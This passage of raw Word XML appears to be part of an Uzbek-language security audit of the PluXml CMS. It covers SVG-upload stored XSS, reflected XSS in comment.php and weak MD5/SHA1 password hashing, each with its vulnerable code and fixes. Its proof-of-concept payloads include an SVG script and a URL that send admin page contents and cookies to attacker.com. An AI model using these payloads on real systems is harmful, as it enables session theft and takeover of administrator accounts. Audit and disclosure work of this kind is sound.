                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Yuklangan kontentni PHP sifatida ijro etilishini oldini olish uchun .php fayllarni tahrir qilishni taqiqlash</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Faqat .css, .html, .txt kengaytmalarini ruxsat berish</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Web server darajasida PHP execution'ni media va theme papkalarida o'chirish (php_flag engine off)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2. SVG Fayl Upload orqali Stored XSS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0"/>
        <w:gridCol w:w="7360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E74C3C" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">[VUL-002] SVG Fayl Upload orqali Stored XSS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74C3C"/>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CVSS Score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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">7.3 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N)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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">core/lib/class.plx.medias.php — uploadFiles() / _uploadFile()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Media menejerida SVG fayllarni yuklash imkoni ochiq. SVG fayllari HTML/JavaScript kodni o'z ichida saqlashi mumkin. Brauzer SVG faylni to'g'ridan-to'g'ri ochganda (application/svg+xml yoki image/svg+xml sifatida), ichidagi &lt;script&gt; tagi ijro etiladi.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">doc_exts regex'da .svg kengaytmasi ruxsatli fayllar ro'yxatida mavjud:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  '/.(7z|aiff|...|svg|...|zip)$/i'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">SVG fayli media papkasiga yuklanib, to'g'ridan-to'g'ri URL orqali ochilganda XSS ishlaydi. Hech qanday Content-Type header yuklanmaydi — brauzer o'zi .svg faylni SVG sifatida interpret qiladi.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 Admin sessiyasini o'g'irlash (cookie theft)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Admin nomidan amallar bajarish (CSRF bypass)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Keylogger joylashtirish</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Admin panelida to'liq nazorat (boshqa admin harakatlarini kuzatish)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Boshqa foydalanuvchilar (agar rasm public sahifada ko'rsatilsa) ham zarar ko'rishi mumkin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PoC /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1. Quyidagi mazmunga ega malicious.svg fayli yaratish:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  &lt;svg xmlns="http://www.w3.org/2000/svg"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    &lt;script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">      fetch('/core/admin/', {credentials:'include'})</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">        .then(r=&gt;r.text())</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">        .then(t=&gt;fetch('https://attacker.com/steal?d='+btoa(t)));</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    &lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    &lt;text&gt;Normal SVG&lt;/text&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  &lt;/svg&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Admin Media Menejeriga kirish &gt; Fayl yuklash</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3. malicious.svg ni yuklash (ruxsat beriladi)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">4. Yuklangan faylning URL'ini ochish:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">   http://target.com/data/medias/malicious.svg</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Natija: JavaScript ijro etiladi, admin cookie/token o'g'irlanadi.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 SVG fayllarni yuklashni taqiqlash yoki SVG fayllarni sanitize qilish (DOMPurify)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- SVG fayllar uchun Content-Disposition: attachment header qo'yish</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Web server konfiguratsiyasida SVG'larga Content-Type: text/plain belgilash</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Imkon bo'lsa, SVG'larni doc_exts ro'yxatidan olib tashlash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3. Admin Panelida Reflected XSS (GET parametr)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0"/>
        <w:gridCol w:w="7360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E74C3C" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">[VUL-003] Admin Panelida Reflected XSS (GET parametr)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74C3C"/>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CVSS Score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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">6.8 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N)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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">core/admin/comment.php:131 va comment_new.php:131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comment.php va comment_new.php fayllarida $_GET['a'] parametri HTML sahifaga hech qanday sanitizatsiyasiz to'g'ridan-to'g'ri chiqariladi:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  Zaif kod (comment.php:131):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  &lt;a href="comments.php?a=&lt;?php echo $_GET['a'] ?&gt;"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Bu holda $_GET['a'] qiymati HTML kontekstida escaped qilinmagan. Tajovuzkor admin foydalanuvchiga maxsus URL jo'natishi va XSS attack'ini amalga oshirishi mumkin.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Eslatma: comment.php va comment_new.php sahifalari autentifikatsiyani talab qiladi (admin yoki moderator), lekin XSS link'ini phishing orqali jo'natish mumkin.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 Admin sessiyasini o'g'irlash</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Admin nomidan amal bajarish (article o'chirish, foydalanuvchi qo'shish, parol o'zgartirish)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Defacement</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Odatda Reflected XSS Self-XSS deb hisoblanishi mumkin, lekin admin sessiya hijacking uchun jiddiy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PoC /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URL: http://target.com/core/admin/comment.php?a="&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Brauzerda admin sifatida kirish va bu URL'ga o'tish orqali alert chiqadi.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Admin cookie o'g'irlash uchun:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  ?a="&gt;&lt;script&gt;document.location='https://attacker.com/?c='+document.cookie&lt;/script&gt;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 Barcha echo $_GET['a'] o'rniga echo plxUtils::strCheck($_GET['a']) ishlatish</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Yoki PHP htmlspecialchars() funksiyasini qo'llash</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Input validation va output encoding tamoyillariga amal qilish</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.4. Zaif Parol Xeshlash (MD5+SHA1)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0"/>
        <w:gridCol w:w="7360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E74C3C" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">[VUL-004] Zaif Parol Xeshlash (MD5+SHA1)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74C3C"/>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CVSS Score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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">core/admin/auth.php:85, core/lib/class.plx.admin.php:456, 300, 310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PluXml parollarni sha1(salt + md5(password)) formatida saqlaydi. Bu zaif kriptografik kombinatsiya:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  Autentifikatsiya kodi (auth.php:85):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  sha1($user['salt'] . md5($_POST['password'])) === $user['password']</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  Parol o'zgartirish (class.plx.admin.php:456):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  $password = sha1($salt . md5($content[$user_id.'_password']));</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MD5 va SHA1 ikkalasi ham:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- GPU bilan millionlab/soniyada sinab ko'rish mumkin (brute force)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Rainbow table hujumiga qarshi zaif</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- NIST tomonidan deprecated deb belgilangan</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Bcrypt/Argon2 kabi zamonaviy algoritmlardan 1000x zaifroq</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 XML ma'lumotlar fayli o'g'irlansa (data/configuration/users.xml), barcha parollarni tezda crack qilish mumkin</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Hashcat yoki John the Ripper bilan: md5 + sha1 kombinatsiyasi bir necha soat ichida crack qilinadi</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Foydalanuvchilar password re-use qilsa, boshqa servislarni ham xavf ostida qoldiradi</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Server backup yoki LFI zaiflik bilan kombinatsiya qilganda kritik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PoC /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users.xml dan hash olish (masalan):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  &lt;password&gt;&lt;![CDATA[e10adc3949ba59abbe56e057f20f883e]]&gt;&lt;/password&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
